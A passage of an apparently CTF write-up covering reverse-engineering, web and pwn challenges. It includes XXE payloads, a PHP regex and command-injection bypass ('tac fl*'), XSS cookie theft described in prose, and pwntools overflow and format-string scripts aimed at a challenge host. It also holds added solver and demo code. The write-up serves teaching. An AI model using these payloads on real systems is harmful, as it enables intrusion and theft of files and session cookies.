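The system is linear over the integers with the same 7x7 coefficient matrix for every 7-character block, so an SMT solver is not actually needed: exact Gauss-Jordan elimination over Fractions gives the unique solution, and a non-integer or non-printable result immediately tells you that a constant was copied wrong. The added example below is my own code, not the writeup's; the matrix rows are the coefficients of the equations above (row k = the k-th equation of a block, column j = flag[j] within the block) and TARGETS are the constants from the script above.

```python
from fractions import Fraction

# Coefficients of one 7-character block, taken from the equations above.
A = [
    [12, 53,  6, 34, 58, 36,  1],
    [83, 85, 12, 73, 27, 96, 52],
    [78, 53, 24, 36, 86, 25, 46],
    [39, 78, 52,  9, 62, 37, 84],
    [23,  6, 14, 74, 48, 12, 83],
    [27, 85, 92, 42, 48, 15, 72],
    [ 4,  6,  3, 67,  0, 26, 68],
]

# The 49 expected results from the script above, in equation order.
TARGETS = [
    18564, 37316, 32053, 33278, 23993, 33151, 15248,
    13719, 34137, 27391, 28639, 18453, 28465, 12384,
    20780, 45085, 35827, 37243, 26037, 39409, 17583,
    20825, 44474, 35138, 36914, 25918, 38915, 17672,
    21219, 43935, 37072, 39359, 27793, 41447, 18098,
    21335, 46164, 38698, 39084, 29205, 40913, 19117,
    21786, 46573, 38322, 41017, 29298, 43409, 19655,
]


def solve_linear(A, b):
    """Exact Gauss-Jordan elimination; raises ValueError if A is singular."""
    n = len(A)
    M = [[Fraction(v) for v in row] + [Fraction(bi)] for row, bi in zip(A, b)]
    for col in range(n):
        pivot = next((r for r in range(col, n) if M[r][col] != 0), None)
        if pivot is None:
            raise ValueError("singular coefficient matrix")
        M[col], M[pivot] = M[pivot], M[col]
        scale = M[col][col]
        M[col] = [v / scale for v in M[col]]
        for r in range(n):
            if r != col and M[r][col] != 0:
                factor = M[r][col]
                M[r] = [rv - factor * cv for rv, cv in zip(M[r], M[col])]
    return [row[n] for row in M]


def matvec(A, x):
    return [sum(a * xi for a, xi in zip(row, x)) for row in A]


def recover_flag(targets, A=A):
    """Solve every block and reject anything that is not a printable byte."""
    size = len(A)
    if len(targets) % size:
        raise ValueError("target count is not a multiple of the block size")
    out = []
    for start in range(0, len(targets), size):
        for v in solve_linear(A, targets[start:start + size]):
            if v.denominator != 1 or not 32 <= v <= 127:
                raise ValueError(f"block at {start}: non-printable solution {v}")
            out.append(int(v))
    return bytes(out)


if __name__ == "__main__":
    print(recover_flag(TARGETS))
```

z3 remains the right tool when the equations involve byte truncation, shifts or XOR; for plain integer-linear systems like this one, exact elimination is faster and reports inconsistencies instead of quietly returning unsat.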

debug

image-20191125202546147

Looking at the decompiled code in IDA, the input is compared directly against the string s**

Our 16bit Games

In IDA's decompilation the program ends with a series of output statements that XOR a run of data bytes with the values at ds:0fa2 and ds:0fa4 in turn; that should be the flag.

image-20191125203551803

Working backwards, the value at ds:0fa2 has to pass a chain of checks, and from the checking algorithm the two key values can be derived: c0h and deh.

image-20191125204003878

# Byte table copied from the binary; several entries were lost in the original
# post and are marked None here rather than guessed.
a = [0x8E, 0x9D, 0xDA, 0xCD, 0x21, 0x86, 0xDF, 0xB4, 0x02, 0x94, 0x21, 0x86, 0xDF, 0xB4, 0x02, 0x98,
     None, 0xBB, None, 0x89, None, 0xF3, None, 0xEF, None, 0x83, None, 0xEE, None, 0xAD, 0xB2, 0x9B,
     0x9F, None, 0xEC, None, 0x9F, 0x9A, 0xF0, None, 0xEB, 0x9F, None, 0x97, None, 0xF6, 0xBC, None,
     0xF1, 0xE9, 0x9F, None, 0xE7, None, 0xA1, 0xB3, 0xF3, 0xA3]

# Even positions are XORed with the value at ds:0fa2 (0xC0), odd ones with ds:0fa4 (0xDE)
for i in range(30):
    if a[i] is None:
        continue
    if i % 2 == 0:
        a[i] = a[i] ^ 0xC0
    else:
        a[i] = a[i] ^ 0xDE

print([hex(v) if v is not None else None for v in a[:30]])

WEB

Fake XML cookbook

The challenge says the flag is at /flag.
After submitting user and passwd, intercept the request; testing shows the user field is vulnerable to XXE.
Read the flag directly with an external entity.

True XML cookbook

Same XXE as the previous challenge, but the hint says to do more with it,
so I tried probing the internal network through the entity.
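For both XML challenges the primitive is the same: an external entity declared in the DTD is expanded by a parser that resolves external references, so its content (a local file, or the response of an internal URL in the "True" variant's network probing) lands in the parsed document. The added example below is my own code, not the challenge's: it demonstrates this offline with Python's xml.sax, parsing one payload once with external general entities enabled (a vulnerable server) and once with the default setting, against a constructed temp file standing in for /flag. Swapping the file URL for an http:// URL is what turns the same entity into an internal-network request.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects the character data inside <user>, where the entity is referenced."""

    def __init__(self):
        super().__init__()
        self.in_user, self.user = False, ""

    def startElement(self, name, attrs):
        self.in_user = name == "user"

    def endElement(self, name):
        if name == "user":
            self.in_user = False

    def characters(self, content):
        if self.in_user:
            self.user += content


def xxe_payload(target_url):
    """Classic file-read XXE: declare an external entity, reference it in a field."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE root [<!ENTITY xxe SYSTEM "{target_url}">]>\n'
        '<root><user>&xxe;</user><passwd>x</passwd></root>'
    ).encode()


def parse_user(payload, resolve_external):
    """Parse with xml.sax; resolve_external=True mimics a vulnerable server.

    xml.sax leaves external general entities off by default (since 3.7.1); a
    server that turned them on, or uses a parser that defaults to on, leaks.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(payload))
    return handler.user


def demo():
    """Write a constructed 'flag' file, then parse the same payload both ways."""
    with tempfile.NamedTemporaryFile("w", delete=False, suffix=".txt") as f:
        f.write("NCTF{constructed_flag_for_the_example}")
        path = f.name
    try:
        payload = xxe_payload("file://" + path)
        return parse_user(payload, True), parse_user(payload, False)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser:", repr(leaked))
    print("default parser:   ", repr(safe))
```

The fix on the server side is the second configuration: disable external entities (and DTD processing altogether where the application does not need it) rather than trying to filter the request body.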

Easyphp

Level 1: bypass the regex with num=23333%0a
Level 2: str1 must be all digits, md5(str1) and md5(str2) must differ, and after replacing c, x, h, p with 0, 1, 2, 3 the two hashes must be loosely equal (==).
Write a script to find an all-digit string whose md5 starts with 0e or ce and whose remaining characters are all digits after the replacement; that is str1.
str1=9427417
str2 is similar: md5 starting with 0e or ce with the rest all digits after the replacement (md5(str1) and md5(str2) must not both be 0e followed only by digits before the replacement, or the inequality check fails).
str2=q0000653f8c
Level 3
PHP rewrites . in a parameter name to _, so q.w.q passes the first if.
The second if seems to do nothing useful.
The third if forbids cat,
and the command may be at most 8 characters long.
ls shows a flag file in the current directory; I forget the exact name, but it was long, started with fl and exceeded 8 characters.
A wildcard gets around the length limit:
cmd=tac fl*
Payload: num=23333%0a&str1=9427417&str2=q0000653f8c&q.w.q=tac%20fl*
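Level 2 is a PHP loose-comparison exercise: a hash of the form 0e followed only by digits is a numeric string that equals 0 under ==, and the level's character replacement (c, x, h, p to 0, 1, 2, 3) widens the set of hashes that qualify. The added example below is my own code, not the challenge's: it encodes the three conditions as the writeup states them and searches for qualifying strings. The PHP source of the level is not on this page, so the predicate follows the description above, and the search ranges are assumptions.

```python
import hashlib
import re

# Level-2 replacement as described above: c->0, x->1, h->2, p->3.
REPLACE = str.maketrans("cxhp", "0123")
# A digest PHP treats as the number 0 in a loose comparison: "0e" then digits only.
MAGIC = re.compile(r"^0e\d+$")


def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def php_zero_string(h):
    return MAGIC.match(h) is not None


def php_loose_equal(a, b):
    """PHP == on two hex digests: identical, or both numeric strings equal to 0."""
    return a == b or (php_zero_string(a) and php_zero_string(b))


def check_pair(str1, str2):
    """The level's conditions: digits-only str1, raw hashes differ, replaced hashes equal."""
    h1, h2 = md5hex(str1), md5hex(str2)
    return (str1.isdigit()
            and not php_loose_equal(h1, h2)
            and php_loose_equal(h1.translate(REPLACE), h2.translate(REPLACE)))


def find_numeric_magic(start, limit):
    """First all-digit string in [start, start+limit) whose md5 is 0 after replacement."""
    for n in range(start, start + limit):
        if php_zero_string(md5hex(str(n)).translate(REPLACE)):
            return str(n)
    return None


def find_str2(start, limit):
    """A string whose md5 becomes 0 only after the replacement (the writeup's str2 shape)."""
    for n in range(start, start + limit):
        h = md5hex(str(n))
        if not php_zero_string(h) and php_zero_string(h.translate(REPLACE)):
            return str(n)
    return None


if __name__ == "__main__":
    print(find_numeric_magic(240610000, 1000))       # 240610708 is a known magic hash input
    print(check_pair("240610708", "QNKCDZO"))        # False: both raw hashes are 0e..., so != fails
```

The second print shows the subtlety the writeup notes: two well-known magic-hash inputs do not work together, because their raw digests are already loosely equal and the first check rejects them; one side has to become 0e-digits only through the replacement.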

Simple Xss

Register an account and log in; you can send a message to any user, and a quick test shows the message field is vulnerable to XSS.
There is no filtering at all.
Send admin a message containing an XSS payload that exfiltrates the cookie.
Once the cookie arrives, set it in the browser, press F5, flag obtained.

pwn

hello pwn

from pwn import *

io = remote("139.129.76.65", 50003)

io.interactive()

pwn me years!(I)

#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.log_level = 'debug'
#r = process("./pwn_me_1")
r = remote('139.129.76.65', 50004)
# "yes\0" passes the answer check; the filler reaches the variable that must become 0x66666666
payload = b'yes\x00' + b'a' * 12 + p64(0x66666666) + b'\x00'
#gdb.attach(r)
r.sendline(payload)

r.interactive()

pwn me years!(II)

#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.log_level = 'debug'
#r = process('./2')
r = remote('139.129.76.65', 50005)
offset = 0x10
# Leak a pointer into the binary with %p and derive the PIE base from it
r.recvuntil(b'your name:\n')
r.sendline(b'a' * offset + b'%p')
r.recvuntil(b'ring......\n')
get = r.recv(14)
#get = u64(r.recv()[0:6].ljust(8,'\x00'))
print('leak = ' + get.decode())
base = int(get, 16) - 0x202080
print('addr = ' + hex(base))
target = base + 0x2020E0
one = 0x66666666
print('target = ' + hex(target))

# Write 0x66666666 as two 16-bit halves: print 0x6666 characters, then store the
# count with %hn through the two addresses placed at argument slots 9 and 10
payload = ('%' + str(0x6666) + 'c%9$hn%10$hn').encode()
payload = payload.ljust(0x18, b'\x00')
payload += p64(target) + p64(target + 2)
r.sendline(payload)
'''
payload = '%' + str((one >> 16) & 0xffff) + 'c' + '%9$hn'
payload += p64(target + 2)
r.recvuntil('you want?\n')
gdb.attach(r)
r.sendline(payload)
'''
r.interactive()
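The payload above writes 0x66666666 in two 16-bit halves with %hn, and because both halves are the same value the two writes can share a single %c padding. The added example below is my own code, not the exploit script: it generalises that construction to an arbitrary 32-bit value, ordering the halves so the running character count only ever grows, and checks the result against a tiny model of how printf consumes the payload. The stack layout (our buffer starting at printf argument 6, three 8-byte slots for the format text, addresses right after) is the one implied by the %9$hn/%10$hn indices above and is an assumption of the example, as is the demo address.

```python
import re
import struct


def fmt_write_payload(addr, value, arg_base=6, fmt_slots=3):
    """Format-string payload writing 32-bit `value` at `addr` with two %hn writes.

    arg_base:  printf argument index of the first 8 bytes of our buffer.
    fmt_slots: 8-byte slots reserved for the format text; the addresses follow.
    """
    halves = [(addr, value & 0xffff), (addr + 2, (value >> 16) & 0xffff)]
    fmt, printed = "", 0
    # %hn stores the number of characters printed so far (mod 2^16), so write the
    # smaller half first and pad only by the difference for the second one.
    for i in sorted(range(2), key=lambda k: halves[k][1]):
        pad = (halves[i][1] - printed) % 0x10000
        if pad:
            fmt += f"%{pad}c"            # %c with a width prints exactly `pad` characters
            printed += pad
        fmt += f"%{arg_base + fmt_slots + i}$hn"
    fmt_bytes = fmt.encode()
    if len(fmt_bytes) >= fmt_slots * 8:
        raise ValueError("format text needs more slots (leave room for the NUL)")
    payload = fmt_bytes.ljust(fmt_slots * 8, b"\x00")
    payload += b"".join(struct.pack("<Q", a) for a, _ in halves)
    return payload


def simulate_printf(payload, arg_base=6):
    """Minimal model of printf over our own payload: {address: 16-bit value written}."""
    fmt = payload.split(b"\x00", 1)[0].decode()
    slots = [int.from_bytes(payload[i:i + 8].ljust(8, b"\x00"), "little")
             for i in range(0, len(payload), 8)]
    printed, writes = 0, {}
    for m in re.finditer(r"%(\d*)c|%(\d+)\$hn", fmt):
        if m.group(2) is None:                       # %Nc
            printed += max(1, int(m.group(1) or 1))
        else:                                        # %k$hn
            writes[slots[int(m.group(2)) - arg_base]] = printed & 0xffff
    return writes


def value_at(writes, addr):
    return writes[addr] | (writes[addr + 2] << 16)


if __name__ == "__main__":
    target = 0x6020E0                                 # assumed address for the demo
    p = fmt_write_payload(target, 0x66666666)
    print(p)
    print(hex(value_at(simulate_printf(p), target)))
```

For 0x66666666 the builder reproduces the exploit's format text exactly (%26214c%9$hn%10$hn); for a value with different halves it emits the smaller write first and a second %c for the difference, which is the ordering mistake that most often turns a working write into a wrong one.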